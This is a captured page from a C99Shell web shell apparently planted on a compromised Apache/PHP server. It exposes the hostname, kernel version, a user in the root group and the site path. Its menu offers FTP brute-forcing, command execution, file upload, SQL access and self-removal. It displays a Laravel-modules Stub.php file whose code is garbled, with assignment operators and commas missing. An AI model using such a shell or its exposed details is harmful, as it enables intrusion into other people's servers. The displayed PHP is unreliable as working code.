!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/nwidart/laravel-modules/src/Support/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Stub.php (2.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Nwidart\Modules\Support;

class 
Stub
{
    
/**
     * The stub path.
     *
     * @var string
     */
    
protected $path;

    
/**
     * The base path of stub file.
     *
     * @var null|string
     */
    
protected static $basePath null;

    
/**
     * The replacements array.
     *
     * @var array
     */
    
protected $replaces = [];

    
/**
     * The contructor.
     *
     * @param string $path
     * @param array  $replaces
     */
    
public function __construct($path, array $replaces = [])
    {
        
$this->path $path;
        
$this->replaces $replaces;
    }

    
/**
     * Create new self instance.
     *
     * @param string $path
     * @param array  $replaces
     *
     * @return self
     */
    
public static function create($path, array $replaces = [])
    {
        return new static(
$path$replaces);
    }

    
/**
     * Set stub path.
     *
     * @param string $path
     *
     * @return self
     */
    
public function setPath($path)
    {
        
$this->path $path;

        return 
$this;
    }

    
/**
     * Get stub path.
     *
     * @return string
     */
    
public function getPath()
    {
        
$path = static::getBasePath() . $this->path;

        return 
file_exists($path) ? $path __DIR__ '/../Commands/stubs' $this->path;
    }

    
/**
     * Set base path.
     *
     * @param string $path
     */
    
public static function setBasePath($path)
    {
        static::
$basePath $path;
    }

    
/**
     * Get base path.
     *
     * @return string|null
     */
    
public static function getBasePath()
    {
        return static::
$basePath;
    }

    
/**
     * Get stub contents.
     *
     * @return mixed|string
     */
    
public function getContents()
    {
        
$contents file_get_contents($this->getPath());

        foreach (
$this->replaces as $search => $replace) {
            
$contents str_replace('$' strtoupper($search) . '$'$replace$contents);
        }

        return 
$contents;
    }

    
/**
     * Get stub contents.
     *
     * @return string
     */
    
public function render()
    {
        return 
$this->getContents();
    }

    
/**
     * Save stub to specific path.
     *
     * @param string $path
     * @param string $filename
     *
     * @return bool
     */
    
public function saveTo($path$filename)
    {
        return 
file_put_contents($path '/' $filename$this->getContents());
    }

    
/**
     * Set replacements array.
     *
     * @param array $replaces
     *
     * @return $this
     */
    
public function replace(array $replaces = [])
    {
        
$this->replaces $replaces;

        return 
$this;
    }

    
/**
     * Get replacements.
     *
     * @return array
     */
    
public function getReplaces()
    {
        return 
$this->replaces;
    }

    
/**
     * Handle magic method __toString.
     *
     * @return string
     */
    
public function __toString()
    {
        return 
$this->render();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--